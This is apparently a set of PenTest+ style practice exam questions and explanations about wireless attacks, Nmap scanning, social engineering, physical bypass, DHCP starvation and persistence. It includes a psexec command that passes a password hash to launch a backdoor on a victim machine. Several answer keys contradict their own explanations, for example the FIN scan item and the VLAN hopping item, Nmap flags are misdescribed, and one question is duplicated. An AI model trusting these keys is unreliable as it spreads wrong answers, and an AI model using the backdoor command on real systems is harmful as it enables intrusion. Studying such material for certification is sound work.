You should not run the Set-DnsServerPrimaryZone -Name “nutex.contoso.com” -DynamicUpdate “NonsecureAndSecure” command from PowerShell. This command will specify that the nutex.com zone allow both secure and nonsecure dynamic updates.
You should not run the Set-DnsServerPrimaryZone -Name “nutex.com” -SecondaryServers 10.0.0.2 command from PowerShell. This command adds the address and name of another DNS server that is allowed to receive zone transfers, which would be a required step (either in the GUI or using PowerShell) to make it possible for a second DNS server to host a secondary copy of the zone.
You should not run the Set-DnsServerPrimaryZone -Name “nutex.com” -ReplicationScope “Forest” command from PowerShell. This command will change the scope of replication for the nutex.com zone to forest-wide.
As part of a WLAN pen test, your team has set up an AP solely for the purpose of sniffing and capturing probe requests sent by stations in your environment. The ultimate aim of the test is to generate SSIDs on the AP to which it is hoped that the stations will attempt to associate.
What type of attack is this?
A.Deauthentication
B.KARMA
C.KRACK
D.Downgrade
B.KARMA
Explanation:
This is a Karma Attacks Radioed Machines Automatically (KARMA) attack. In this attack the goal is to enumerate and generate SSIDs which the stations (which can include phones, laptops, and anything with a radio) have saved in their Preferred Network List (PNL). These are network profiles saved in the station complete with credentials that stations attempt to locate with probe requests at all times when they are not associated with an AP.
This is not a key reinstallation attack (KRACK). When successfully exploited, that attack, which targets WPA and WPA2, could allow unauthenticated attackers to reinstall a previously used encryption or integrity key. They can then use the key to decrypt captured traffic. Many capture utilities have the ability to use the key to decrypt the traffic in real time as it is captured.
This is not a downgrade attack. This attack forces a system to use a weaker encryption protocol, one where hopefully for the tester or hacker it will be easier to crack the key. The Padding Oracle On Downgraded Legacy Encryption (POODLE) vulnerability in OpenSSL is an example.
This is not a deauthentication attack. That is a DoS attack in which the tester or hacker sends deauthentication frames, which causes stations to disconnect from the AP making wireless communication impossible.
You are running a Nmap TCP FIN scan against a target. The scan output shown below indicates that port 53 is open.
Which of the following occurred that would indicate that the port is open?
A.No response received
B.TCP FIN received
C.RST packet received
D.SYN/ACK received
B.TCP FIN received
Explanation:
The given exhibit show that the nmap command is being run with the -v -sF parameters. The -sF parameter runs a TCP FIN scan. With a TCP FIN scan, the TCP FIN bit is set in the packet header. The expected behavior when receiving such a packet is for a receiving target with an open port to just ignore or drop the packet. Therefore, if there is no response, that means the packet made it to its destination, was then dropped, which indicates an open port.
The answer is not No response received. It is important to note that a non-response doesn’t always mean an open port because a basic TCP FIN scan cannot distinguish between an open port versus a filtered port.
Also note that a TCP FIN scan is not useful when scanning Windows-based systems, as it will respond with RST packets, no matter if the port is open or closed.
A web application is finally finished. The developer wants to test the code of the application for errors and weaknesses before it goes out to a full Q/A.
Which of the following scan processes should the software developer perform? (Choose two.)
A.Dynamic
B.Static
C.Compliance
D.Vulnerability
A.Dynamic
D.Vulnerability
Explanation:
The software developer should perform a dynamic vulnerability scan. Dynamic scans are performed while the software is running, preferably in a sandbox or non-production environment, and do not have back-end access to the code.
Vulnerability scanning is a category of tools under the Dynamic Application Security Testing (DAST) tools. It is always best to run vulnerability scanning against a web application because it is going to find issues such as cross-site scripting, SQL injection, and command injection. A good example of this tool is Open Web Application Security Project Zed Attack Proxy, or OWASP ZAP.
Static analysis is what the name implies, investigating something when it is not up and running. Usually this involves looking under the hood, tearing apart the code, and seeing what would happen if it was alive and running. This analysis can be done on a number of programs, even malware, where it’s considered safer and/or won’t be intrusive. Hopefully a static analysis was already performed before releasing the software online, or else the vulnerability scan will find many issues.
Compliance scans, by their very nature, are only interested in whatever compliance rules your company needs to follow. For instance, if you are a hospital or medical clinic, you need to be in compliance with HIPAA. In this scenario, the developer should perform an overall vulnerability/dynamic scanning of this web app for errors and weaknesses.
Which of the following security issues can be mitigated with deadbolts?
A.lock picking
B.entry key theft
C.lock bypass
D.failsafe
C.lock bypass
Which of the following security issues can be mitigated with deadbolts?
A.lock picking
B.entry key theft
C.lock bypass
D.failsafe
C.lock bypass
Explanation:
Lock bypass is a technique where the lock mechanism is never engaged or attacked but rather is bypassed. An example is where an attacker inserts a sprung steel device to retract the spring-loaded catch that restrains the shackle, preventing it from operating. The use of deadbolts helps avoid lock bypass. The locking mechanism and bolt are operated by the key. This prevents the device from being opened without the locking mechanism itself being properly operated.
Lock picking cannot be prevented by deadbolt. This is an attack on the lock mechanism itself rather than an attempt to go around the mechanism.
Entry key theft cannot be mitigated with deadbolts because the stolen key will operate and unlock the deadbolt.
Failsafe is a principle by which an electronic door defaults to an unlocked state when power is lost to the door. This cannot be prevented with deadbolts, as the deadbolt will open when power is lost.
In the process of performing a pen test, one of your associates spent a significant amount of time outside in the smoking area near the trash bins discussing a wide range of topics with employees, such as favorite sports teams, favorite bands, and other topics about which the employees seemed passionate.
What is this social engineering technique called?
A.spear phishing
B.dumpster diving
C.pretexting
D.elicitation
D.elicitation
Explanation:
This information gathering technique is called elicitation. It is the art of getting information without directly asking for it. Using this technique testers (or hackers) use open-ended questions to prompt users to share information while in an unguarded mental state. When discussing topics of interest to the users, they often share data that could be useful in compromising a network, such as data bits that could be used in passwords (favorite team, favorite band).
While it did happen near the trash bins, this is NOT dumpster diving. This is the process of going through the trash to locate written material that may be helpful, such as network diagrams and organizational charts.
This is not spear phishing. Spear phishing is a form of phishing that is targeted to a single individual rather than to thousands of users.
This is not pretexting. Pretexting is the process of establishing a reason to talk to someone as a method of putting them at ease and lowering their guard. One of the ways of doing this is to present yourself as an IT technician. Pretexting often involves a scam where the liar pretends to need information in order to confirm the identity of the person they are talking to (password) .
You are designing a pen test in which you want to see if you can successfully send unsolicited text messages to company smartphones and laptops.
What type of attack are you simulating?
A.RFID cloning
B.Jamming
C.Bluejacking
D.WPS implementation weakness
C.Bluejacking
Explanation:
You are testing the likelihood that a Bluejacking attack will succeed. In this attack, the Bluetooth service is utilized to send unsolicited text messages to devices where the Bluetooth service is enabled and the device is left in a discoverable mode.
You are not simulating a WPS implementation weakness attack. This is an attack on the Wi-Fi Protected Setup (WPS) service, which was designed to make attaching new devices to a home wireless network easier by transmitting the WPA or WPA2 PIN to the new device. By using a utility called Reaver, the PIN can be cracked.
You are not simulating an RFID cloning attack. In this attack, RFID tag information is captured wirelessly as it is transmitting between label and reader. In some cases, this cloned information may be that which is required to enter a secure room or area (user badges).
You are not simulating a jamming attack. This is a DoS attack in which the frequency the company AP uses is jammed, preventing all communication with the AP.
As a digital forensics investigator you find the following code on a system.
super_code = “pentest+” new_code = []
for letters in super_code[0:6:2]:
new_code.append(letters+” “)
print(new_code)
What is the correct output of this code?
A.[‘p’, ‘e’, ‘n’, ‘t’, ‘e’, ‘s’, ‘t’]
B.[‘p’, ‘n’, ‘e’]
C.[‘p’, ‘e’, ‘n’, ‘t’]
D.[‘p’, ‘e’, ‘n’, ‘t’, ‘e’]
B.[‘p’, ‘n’, ‘e’]
Explanation:
The code starts with the variable super_code being set to pentest+. It then initializes another variable, new_code, but it is set to be an empty list.
The for loop will go through all of the indented code as long as the condition is true. Therefore, in our case, the loop will occur the number of times that there are characters in super_code. Thus, we get eight cycles through the loop. However, the numbers within the brackets change the situation. The three numbers signify the following [starting position: ending position (not inclusive): the step value]. In this question, we have [0:6:2], which in turn means that the letter would be p for the first iteration. Then it would be n because we go from 0 to 2 (due to the step value) and the index value of 2 gives us n. Once again, we go from 2 to 4, which gives us e. Now the step value brings us to 6. However, since the end position is 6, it is not inclusive. Therefore, we are left with p, n, and e.
As the for loop is iterating, each of the letters is appended to the list new_code. The last line calls the print function to print the list new_code.
Shimming is an example of which of the following?
A.egress sensor attack
B.lock picking
C.lock bypass
D.badge cloning
C.lock bypass
Explanation:
Shimming, in which a thin slip of material is inserted between the door and the lock mechanism, is an example of lock bypass. Lock bypass is a technique where the lock mechanism is never engaged or attacked, but rather is bypassed by inserting a sprung steel device to retract the spring-loaded catch that restrains the shackle, preventing it from operating. The use of deadbolts helps to avoid lock bypass.
Shimming is not an example of lock picking because in lock picking the lock mechanism is attacked, not bypassed.
Shimming is not used in an egress sensor attack. This is an attack that takes advantage of an electronic door opening from the inside when someone approaches. It does not use shimming but usually uses an “under the door tool” to cause an electronic door to open due to motion on that side of the door.
Shimming is not used in security badge cloning. One of the most common techniques to do this is to clone radio-frequency identification tags on the badges.
The value of the target has the largest effect on which characteristic of the pen test?
A.rules of engagement
B.budget
C.NDA
D.schedule
B.budget
Explanation:
When critical resources, or targets, are high-value or mission-critical, organizations tend to spend more time and money to test these against vulnerabilities. Therefore, the budget is most affected by the value of the target being pen tested.
The value of the target will not impact the schedule. What will impact the schedule is any need to assess resources under heavy loads, which is typically at certain times of the day.
While the rules of engagement can be used to exempt a high-value target from assessment, its value will not affect the rules of engagement if the target needs to be assessed.
Because the NDA typically prohibits the tester sharing any information from the test, the value of a target will not affect the NDA.
While attacking the network at InterConn, you were able to do some VLAN hopping around their supposedly segmented networks and you scored a hit.
Which of the following best practices would have helped to protect against VLAN hopping and made the pen tester’s job harder? (Choose all that apply.)
A.Administratively configure access ports as access ports.
B.You should control Spanning Tree features to stop unknown devices or all users from manipulating the controls.
C.Limit the number of MAC addresses learned on a given port.
D.Disable Dynamic Trunking Protocol.
B.You should control Spanning Tree features to stop unknown devices or all users from manipulating the controls.
C.Limit the number of MAC addresses learned on a given port.
Explanation:
All of these options are correct. VLAN hopping is a method of gaining access to traffic on other VLANs that would normally not be accessible. There are two primary methods of VLAN hopping: switch spoofing and double tagging.
When you perform a switch spoofing attack, you imitate a trunking switch by sending the respective VLAN tag and the specific trunking protocols.
Double tagging is modifying the ethernet frame on a packet to allow packets to go through any VLAN. This works due to inherent defaults in many switches and how they process tags, If you put two tags on the ethernet frame of a packet the switch will, by default, only remove one tag and the frame is still tagged, so the packet moves on inside the network. Now there are things to remember on this attack, it’s only one way as it’s impossible to do this on a return packet.
Several best practices can help mitigate VLAN hopping and other Layer 2 attacks. The following are a few examples of best practices for securing your infrastructure, including Layer 2:
Select an unused VLAN (other than VLAN 1 as it is the default) and use it as the native VLAN for all your trunks. Do not use this native VLAN for any of your enabled access ports as there are no default controls in place and it stays empty in case of an attack. Administratively configure access ports as access ports so that users cannot negotiate a trunk. Disable the negotiation of trunking (that is, do not allow Dynamic Trunking Protocol [DTP]). Limit the number of MAC addresses learned on a given port with the port security feature. This will lock down security in its most basic form. The feature remembers the Ethernet MAC address connected to the switch port and allows only that MAC address to communicate on that port. If any other MAC address tries to communicate through the port, port security will disable the port. Control Spanning Tree features to stop users or unknown devices from manipulating the controls. You can do so by using the BPDU Guard and Root Guard features.
Dynamic Trunking Protocol (DTP) is a proprietary Cisco networking protocol for the purpose of running connections between trunk lines to be able to talk to each other. Because this is no longer a very secure protocol, it should be restricted from anyone who is not a sysadmin.
Following these best practices can help prevent a user from maliciously negotiating a trunk with a switch and then having full access to each of the VLANs by using custom software on the computer.
At Interconn, you are running a vulnerability scan during the working day. You are cognizant of the accessible bandwidth and how many attack threads are running.
If your goal is to reduce bandwidth usage, which two attacks must you change the settings of or decide not to run, depending on your project scope? (Choose two.)
A.Fragmentation B.Flooding C.Decoy D.Frequency E.Denial-of-service
B.Flooding
E.Denial-of-service
Explanation:
You should either change the settings for or not run denial-of-service (DoS) attacks. These flooding attacks include:
Smurfing: Smurfing is a type of denial-of-service attack that floods the network with a sudden massive volume of traffic by using, and manipulating, IP addresses. This differentiates from your normal DoS by using the broadcast protocols to amplify the attacks in the network to be as large as they want. Smurfing attacks are less popular today because we don’t have the openness of early broadcast protocols. DoS/Ping Flooding: This attack runs by using/abusing the ping function to send a flood of ICMP echo requests over the target network, causing it to get so congested it crashes. This does not do damage to the network beyond putting it out of commission until the attack stops. DDoS: When the attack traffic comes from multiple devices, the attack becomes a DDoS or distributed denial-of-service attack.
These attacks are meant to take a network or device offline. Their purpose is to send so many requests or packets into the network or device that it stops functioning.
Fragmentation is an interesting option to run in Nmap or Zenmap. It is meant to get around firewalls and IDS, so by its very nature is a quiet option to run. It should not greatly affect bandwidth, as opposed to a DoS or flooding attack.
Decoy is another stealth option in Nmap. It acts as a manual VPN as it tells the network logs or anyone listening that you are at a different IP address. Again, this type of test would not greatly affect bandwidth.
Frequency is not too big of an issue, it depends on your project scope and when your attacks are happening. If they happen during normal office hours, you are not going to stand out with sending out some carefully crafted packets. Where you will stand out is when you flood the network with DoS ICMP packets grinding the place to a halt.
A penetration tester was able to convince an employee to give them valid login credentials, including user name and password. You need to prevent this from happening in the future.
Which remediation step should be recommended?
A.Mandate all employees take security awareness training.
B.Increase password complexity requirements.
C.Implement an IPS.
D.Implement multi-factor authentication.
A.Mandate all employees take security awareness training.
Explanation:
Mandating all employees take security awareness training should be recommended. The penetration tester used social engineering to obtain valid login credentials. The only way to prevent this type of attack is to ensure that employees understand social engineering attacks.
Implementing multi-factor authentication may reduce the likelihood of a social engineering attack. However, the employees may still not understand about giving out credentials, so this type of attack could occur again. This is the appropriate remediation if passwords were easy to break using a dictionary or brute force attack.
Implementing an intrusion prevention system (IPS) would ensure that intrusion attempts into the network are detected and stopped. You would implement an IPS to prevent attacks that follow certain patterns or that are already known and documented.
Increasing password complexity would ensure that passwords are stronger. This is an appropriate remediation if passwords were easy to break using a dictionary or brute force attack, but would not help in this scenario.
You are designing a pen test that mimics the activities of a script kiddie. Which of the following activities should you most likely perform as this “type of attacker”?
A.Impersonate a technician that was laid off.
B.Steal funds.
C.Post political message on your website.
D.Perform a SQL injection.
A.Impersonate a technician that was laid off.
Explanation:
Activities, such as impersonating a laid off technician, could be done using any of the options but is MOST like the actions of a script kiddie. These hackers are not technically advanced, use prepacked attack tools that they may or may not understand, and use well-known methods.
Script kiddies do not have in-depth hacking skills or knowledge, and are limited to using tools and scripts created by other hackers. The traces they leave may ultimately lead to their capture or exposure. Their lack of experience may present a less significant threat than a professional hacker.
A SQL injection takes more skill than a script kiddie typically possesses and is more like the activities of an advanced persistent threat (APT) actor.
Posting political messages on your website is not a normal activity of a script kiddie. This type of attack is common to a hacktivist.
Stealing funds is not usually within the skill of a script kiddie. These are more likely to be the actions of an organized crime syndicate or an insider threat.
A pen tester runs the following command to create a persistent connection to a victim’s computer:
C:\sec>psexec \172.16.0.121 –u chris –p 9345677+D5B8710D7FEEC0F3BF500B33 C:/backdoor.bat
PSExec v1.98 – Execute processes remotely
Copyright 2001-2010 Mark Russinovich
Sysinternals – www.sysinternals.com
Opening socket on port 5555
Backdoor listening on port 5555
Awaiting connection…
What is being accomplished?
A.The attacker is using psexec to connect to the victim’s computer (172.16.0.121), then using the victim’s username and a password hash to start a backdoor .exe file.
B.The attacker is using psexec to connect to the victim’s computer (172.16.0.121), then using the victim’s username and password to drop off a backdoor .exe file.
C.The attacker is using psexec to connect to the victim’s computer (172.16.0.121), then using the victim’s username and password to start a backdoor .exe file.
D.The attacker is using psexec to connect to the victim’s computer (172.16.0.121), then using the victim’s username and password hash to drop off a backdoor .exe file.
A.The attacker is using psexec to connect to the victim’s computer (172.16.0.121), then using the victim’s username and a password hash to start a backdoor .exe file.
Explanation:
The attacker is using psexec to connect to the victim’s computer at 172.16.0.121, then using the victim’s username and a password hash to start a backdoor .exe file. The file is already on the system and just needs to be run to maintain persistence.
Note that we have the hash and not the password, but the hash itself is powerful to have because it is what the computer uses to authenticate. So instead of sending the password for the computer to then hash and check the hash, we are immediately sending the hash off for authentication.
Because the file is already on the system, there is no need to drop it off.
We have the password hash (9345677+D5B8710D7FEEC0F3BF500B33), not the password (ie: P@ssw0rd2). That can be harder if you are using a password manager like LastPass, but different hashes are in set lengths and style still and you can usually tell the difference.
You find one computer in your victim company’s network has RDP open and enabled. What port should you connect to with your RDP tool of choice?
A.21
B.3389
C.8080
D.2323
B.3389
Explanation:
Port 3389 is registered for use by Microsoft Remote Desktop and Remote Assistance connections. “A vulnerability exists in the Remote Desktop Protocol (RDP) where an attacker could send a specially crafted sequence of packets to TCP port 3389 which can result in RDP to accessing an object in memory after it has been deleted.” - CVE-2012-2526 and NIST/CVE-2012-2526
It is not port 8080, which does exist. This port is a common alternative HTTP port used for web traffic and HTTP web proxies. Some broadband routers run a web server on port 8080 for remote management.
It is not port 2323, which is used for a Voice over Internet Protocol (VoIP) application (Akuvox R50P) running a Telnet service. It is very vulnerable in most cases, and the application cannot be turned off, and the credentials cannot be changed.
It is not port 21, which is of course FTP. FTP is also very vulnerable if not secured properly because it transmits everything in plaintext.
There are a total of 65,535 ports in the TCP/IP protocol that are vulnerable to attacks. You should know the following commonly used ports and protocols.
FTP - ports 20 and 21
SSH, SCP, and SFTP - port 22
Telnet - port 23
SMTP - port 25
TACACS - port 49
DNS server - port 53
DHCP - ports 67 and 68
TFTP - port 69
HTTP - port 80
Kerberos - port 88
POP3 - port 110
NetBIOS - ports 137-139
IMAP4 - port 143
SNMP - port 161
LDAP - port 389
SSL and HTTPS - port 443
SMB - port 445
LDAP with SSL - port 636
FTPs - ports 989, 990
Microsoft SQL Server - port 1433
Point-to-Point Tunneling Protocol (PPTP) - port 1723
RDP protocol and Terminal Services - port 3389
While performing a penetration test, a contractor discovers a vulnerability that is being actively used to attack the company’s Web server. The contractor knows how to implement the mitigation for the vulnerability and has the appropriate access to do so. Which two actions should the contractor take? (CHOOSE TWO)
A.Document the findings with an executive summary, recommendations, and screenshots of the vulnerability.
B.Notify management regarding the findings and suggest the appropriate mitigation.
C.Log in and deploy the appropriate mitigation.
D.Escalate the issue according to the rules of engagement and suggest the appropriate mitigation.
E.Shut down the Web server until the appropriate mitigation can be deployed.
A.Document the findings with an executive summary, recommendations, and screenshots of the vulnerability
D.Escalate the issue according to the rules of engagement and suggest the appropriate mitigation.
Explanation:
The contractor should escalate the issue according to the rules of engagement and suggest the appropriate mitigation. He should also document the findings with an executive summary, recommendations, and screenshots of the vulnerability. Escalation is an appropriate action based on the rules of engagement, and documentation is an appropriate action because this vulnerability is a finding of the penetration test.
The contractor should not log in and deploy the appropriate mitigation. Rules of engagement rarely include deploying mitigations, especially when a contractor is being used. Rules of engagement may include approval to deploy mitigations if an internal penetration test is being completed.
The contractors should not notify management regarding his findings and suggest the appropriate mitigation. Management will only want the details in the executive summary and is not usually involved in the escalation procedures documented in the rules of engagement.
The contractor should not shut down the Web server until the appropriate mitigation can be deployed. The rules of engagement do not usually include taking the appropriate precautions or deploying mitigations unless an internal penetration test is being completed.
Which of the following situations is LEAST likely to have a requirement of immediate communication with the system owner if discovered during a penetration test?
A.The system logs indicate that a prior unauthorized compromise has occurred.
B.The system requires some hardening.
C.The system contains unencrypted personally identified information (PII).
D.The system becomes unavailable during the penetration test.
B.The system requires some hardening.
Explanation:
The LEAST likely situation to need immediate communication with the system owner would be that the system requires some hardening. This is often a common find during a penetration test and would not have as high a priority as the other listed scenarios. This type of information would just be included in your final report.
The other issues are more likely to require immediate communication as part of the rules of engagement. Communication requirements are documented early in the project. In most cases, testers would communicate immediately with the system owner if critical issues were discovered.
If a system contains unencrypted personally identifiable information (PII), the tester should contact the system owner unless the tester was informed of this condition prior to the test.
If system logs indicate that a prior unauthorized compromise has occurred, the tester should immediately contact the system owner. Compromises should always be considered critical issues that trigger immediate communication.
If a system becomes unavailable during the penetration test, the tester should immediately contact the system owner. Unavailable systems cannot be properly tested.
An attacker is using the Yersinia application to exhaust the IP address pool available from a company’s DHCP server. After sending a high volume of DHCPDISCOVER packets and running the DHCP server out of addresses in the DHCP pool, what should the attacker do next?
A.Perform DHCP snooping.
B.Set up a rogue DHCP server.
C.Flood the server with DHCPOFFER packets.
D.Send additional DHCPDISCOVER packets.
B.Set up a rogue DHCP server.
Explanation:
After flooding the DHCP server with DHCPDISCOVER packets, the attacker needs to set up a rogue DHCP server to fulfill legitimate DHCP requests as they come in. Yersinia is an application that can help carry out a DHCP starvation attack. In a DHCP starvation attack, the attacker sends a large volume of phony, spoofed DHCP requests. The server will respond to those requests, thinking they are legitimate, and eventually the DHCP server will run out of assigned IP addresses in its pool. The attacker would then set up their own rogue DHCP server to respond to legitimate requests from other machines on the network that default to the rogue DHCP server. The attacker could then assign addresses that route victims to a default gateway of the attacker’s choosing, effectively establishing a man-in-the-middle attack.
DHCP snooping is a defense against rogue DHCP servers because it helps determine if DHCP traffic is legitimate or not. Using trusted switch ports, it can establish a trusted flow, and if any DHCP server traffic originates or goes outside of that expected trusted flow, it can reject that traffic as illegitimate.
DHCPDISCOVER and DHCPOFFER are both packet types used in the client/server process to assign an IP address. The DISCOVER packet originates from the client, looking for a DHCP server to assign them an IP address. DHCPOFFER is the response from the server to the client’s request, and sends an IP address that the client can use. There would be no need to send more DHCPDISCOVER packets once the DHCP server runs out of addresses in the pool. DHCPOFFER packets would not adversely impact the DHCP server as they are sent to DHCP clients.
Using nmap, you have determined that port 20 and 21 are open on a server and that there is traffic using this port number traversing the network.
What tool would be the best to use to leverage this vulnerability?
A.evil twin
B.honeypot
C.sniffer
D.rainbow table
C.sniffer
Explanation:
As port 20 and 21 are used by FTP and FTP is a clear text protocol, a sniffer could be used to capture both the FTP data and authentication credentials. All of this is transmitted in clear text.
An evil twin would not be the best approach. An evil twin is a wireless access point that uses the same SSID as your legitimate AP but on a different channel. By jamming the channel of the legitimate AP, all devices associated with that AP will be disconnected and will then do what they are designed to do, which is to reconnect to any AP hosting that SSID. When they associate with the evil twin, they will then be on the hacker’s network and will be exposed to peer-to-peer attacks. None of this will be an avenue to leveraging the FTP weakness, however, as in our case we can just sniff the existing traffic running through the access points.
A honeypot would not be the correct approach. A honeypot is a system that is configured to be attractive to hackers. Its purpose is twofold. First, it distracts from other devices, and second, it engages the attacker and allows us to collect information about them. None of this will be an avenue to leveraging the FTP weakness, as we are the ones going in there to sniff in the first place.
Using a rainbow table would not be the correct approach. Rainbow tables are preconfigured password hash or encryption key lists that are hashed in advance to speed up the process of cracking a hash or an encryption key. Because FTP is clear text, there is no need to crack password or keys. They can be captured in clear text with a sniffer. Work smarter, not harder!
Your company has several Apple computers with OS X installed. When OS X boots up, launchd is run to finish system startup. This executable loads parameters for the system level from the property list (plist) found in /System/Library/.
Which of these options, if modified properly, will allow you to launch executables for persistence at every reboot?
A.Daemon
B.systemd
C.etc
D.Launch Daemon
D.Launch Daemon
Explanation:
If modified properly, the Launch Daemon will allow you to launch executables for persistence at every reboot. These maybe created with administrator privileges but the weakness, or vulnerability, here is they do not need admin privileges to run on startup leaving you a great way to have your exe, backdoor, trojan to run immediately after a reboot.
Daemon is another name for a background process that is running.
The /etc folder is a directory for the system related configurations folder for your computer.
It is not Systemd. Systemd does not exist in the Mac universe .It is used in Linux/Unix.
One of the procedures you carried out during a pen test was to send several text messages to users requesting that they use a link in the text to log in to their email account and change their signature to use a new logo. If they follow proper security policy, they will ignore these kinds of texts.
What type of attack did you simulate?
A.whaling
B.vishing
C.elicitation
D.smishing
D.smishing
Explanation:
The attack is an SMS phishing or smishing attack. This is one of several forms of a phishing attack. A smishing attack leverages the SMS service which is used for text messages.
The attack that occurred is not a whaling attack, one of several versions of a phishing attack. In a whaling attack, the phishing email is targeted to a “big fish” or a senior officer of the company. All phishing attacks use counterfeit communications to entice a user into using a provided link to log in to a network, website, or database. The link is also counterfeit, but the resulting login page is completely convincing to the victim. When they log in their credentials are stolen or harvested.
This is also not an elicitation attack. In short, elicitation is the act of gaining knowledge or information from a user or company without directly asking for it.
This is not a vishing attack. A vishing attack is a phishing attack that is performed using the telephone or by voice over IP (VOIP).
When performing a compliance-based assessment, what item, when present, should drive the creation of objectives?
A.the results of a pre-assessment
B.regulatory requirements
C.company policies
D.prior assessment results
B.regulatory requirements
Explanation:
The requirements of any regulations, such as HIPAA or PCI-DSS, should be the main driver of objectives. Compliance with these requirements is the whole purpose of a compliance-based assessment.
In cases where there are no regulatory requirements to be met, then the company’s policies might be the driver, but when there are such requirements, the regulatory requirements should drive the objectives.
While prior assessment results should be reviewed for repeat issues, when regulatory requirements are present they should drive the objectives.
Pre-assessments are rare, but even when used, they will not drive the creation of objectives when regulatory requirements are present.
During a recent penetration test, you discovered that passwords for an internal application were stored in plaintext. You must ensure that passwords cannot be read. You need to recommend the BEST remediation for this issue only.
What should you recommend?
A.Encrypt all passwords and implement multi-factor authentication.
B.Hash all passwords and then encrypt the password file.
C.Increase password complexity and implement multi-factor authentication.
D.Hash all passwords and increase password complexity.
B.Hash all passwords and then encrypt the password file.
explanation:
The best remediation for passwords stored in plaintext is to hash all passwords and then encrypt the password file. This will ensure that it is much harder to discover the passwords.
You would not recommend hashing all passwords and increasing password complexity. Password complexity will not prevent the passwords from being stored in plaintext.
You would not recommend encrypting all passwords and implementing multi-factor authentication. Multi-factor authentication would not provide any protection against plaintext passwords.
You would not recommend increasing password complexity and implementing multi-factor authentication. Neither of these remediations address the issue of storing passwords in plaintext.
One of the key executives in the company received an email that appeared to come from the IT security officer requesting that he log into the network using a provided link and confirm his contact information. He did so, and shortly thereafter sensitive documents on his computer were stolen.
What type of attack occurred?
A.whaling
B.vishing
C.elicitation
D.phishing
A.whaling
Explanation:
The attack that occurred is a whaling attack, one of several versions of a phishing attack. In a whaling attack, the phishing email is targeted to a “big fish” or a senior officer of the company. All phishing attacks use counterfeit communications to entice a user into using a provided link to log into a network, website, or database. The link is also counterfeit, but the resulting login page is completely convincing to the victim. When they log in, their credentials are stolen or harvested.
The attack is not just a plain phishing attack. In a basic phishing attack, the phishing email is sent to thousands of potential victims and assumes that a certain percentage of the users will fall for the attack.
This is also not an elicitation attack. In short, elicitation is the act of gaining knowledge or information from a user or company without directly asking for it.
This is not a vishing attack. A vishing attack is a phishing attack that is performed using the telephone or by voice over IP (VOIP).
As a penetration tester, you must perform a half-open port scan that does NOT require a full TCP connection. A portion of the command that you plan to run is as follows:
nmap _______ 192.168.33.24
Which parameter should you include in this command?
A.-sS
B.-sn
C.-sU
D.-sT
A.-sS
Explanation:
The -sS parameter is the Nmap SYN scan command. It is an active scan that sends a TCP SYN packet and does not require a full connection. Depending on the response (or lack thereof), you can use this parameter to determine the status of a port. The following exhibit shows this command:
The -sT parameter of the Nmap command performs a TCP connect scan. It establishes a full TCP connection with the target. It is the default Nmap scan type when no command is specified. It should only be used when the user does not have permission to read/write raw packets. The following exhibit shows this command:
The -sU parameter of the Nmap command performs a UDP scan. It is used to enumerate DNS, SNMP, or DHCP servers, all of which require UDP packets for communication. The following exhibit shows this command:
The -sN parameter of the Nmap command performs a ping scan. It sends an ICMP echo packet by default. If the target responds, then it is alive. If not, the target is considered offline. The following exhibit shows this command:
Which of the following social engineering attacks requires physical access to a facility?
A.whaling
B.spear phishing
C.impersonation
D.USB key drop
D.USB key drop
Explanation:
USB key drop occurs when someone leaves a USB stick with malware on it in open view somewhere in the hopes that a curious user might insert it and unknowingly infect the computer. This can be addressed though training but the most effective approach is to disable all USB ports. It requires physical access to drop the USB key. One of the most famous of these incidents is the Stuxnet virus entering a nuclear facility in Iran via multiple USB drops.
Spear phishing is a form of phishing that is targeted to a single individual rather than to thousands of users. It is done through email and requires no physical access to the facility.
A whaling attack is another of several versions of a phishing attack. In a whaling attack, the phishing email is targeted to a “big fish” or a senior officer of the company. All phishing attacks use counterfeit communications to entice a user into using a provided link to log in to a network, website, or database. The link is also counterfeit but the resulting login page is completely convincing to the victim and when they log in their credentials are stolen or harvested. It is done through email and requires no physical access to the facility.
Impersonation is the process of pretending to be someone else for the purpose of obtaining information. While it can be done in person, in which physical access would be required, it is most often done over the phone or though text or email, which does not require physical access.
During the first stage of a penetration test, you discover multiple critical issues with Internet-facing servers. As a result, the penetration test sponsor has asked you to focus on those servers instead of testing all of the organization’s servers.
Of what is this an example?
A.De-confliction
B.Communication path restructure
C.Goal reprioritization
D.De-escalation
C.Goal reprioritization
Explanation:
This is an example of goal reprioritization. As a result of the sponsor’s request, you would need to implement the change management process to obtain approval of a change to the engagement plan. The change may or may not be approved.
De-escalation occurs when the criticality of one of the findings is reduced. This may happen due to research and analysis that determines the finding is not considered as critical as was once believed.
De-confliction occurs when a conflict between findings or goals is found. Often organizations will need to negotiate with stakeholders when these conflicts exist.
A communication path restructure would occur if a stakeholder needs to be added, removed, or replaced in the communication path.
You want to perform a scan on a network in the least aggressive way possible. Which Nmap command would you run?
A.nmap -sV -T0 -F 192.168.1.1-20
B.nmap -sS -T3 -F 192.168.1.1-20
C.nmap -p80 -T5 192.168.1.1-20
D.nmap -sS -p443 -T1 192.168.1.1-20
A.nmap -sV -T0 -F 192.168.1.1-20
Explanation:
The nmap -sV -T0 -F 192.168.1.1-20 command would be the least aggressive way to scan this network. Timing templates are specified with the -T command and range from the numbers 0-5. -T0 takes by far the longest time to scan a network and is extremely unlikely to set off any IDS alerts due to the slow speed of packets. The following graphic is an example of this command:
The -T0 and -T1 parameters are unlikely to set off IDS alerts, though they take an extremely long time to finish a scan, especially if there are thousands of machines or ports.
- T2 is about ten times slower than a -T3 scan and also carries the same low risk of crashing hosts as -T3. -T3 is the default timing template for scans.
- T4 and -T5 are the fastest timing templates. However, -T5 requires a very high-speed network. This parameter also presents the highest risk for setting off IDS alerts and for crashing hosts.
You need to perform a vulnerability scan for all servers in the Research Department’s subnet. The servers all use IP addresses in the 10.1.1.2 through 10.1.1.10 range. These servers contain highly confidential data.
You need to identify the correct scanning parameters for the servers. Match each configuration on the left with the appropriate scanning setting on the right.
Sensitivity Level:
Assessment scan
Scope
10.1.1.2 - 10.1.1.10
Authentication
Credentialed
The parameters for the vulnerability scan should be:
Sensitivity level - Assessment scan Scope - 10.1.1.2 through 10.1.1.10 Authentication - Credentialed
The sensitivity level is the type of scan (discovery scan or assessment scan). The scope is the range of computers you want to scan. The authentication method in this case should be credentialed because the servers contain confidential data.
A discovery scan simply provides an inventory of discovered hosts. An assessment scan will actually assess all the hosts based on the criteria given (such as IP address).
A credentialed scan will use login credentials of a privileged account to access data that is protected by access control lists (ACLs). A non-credentialed scan would be unable to scan certain areas on the hosts.
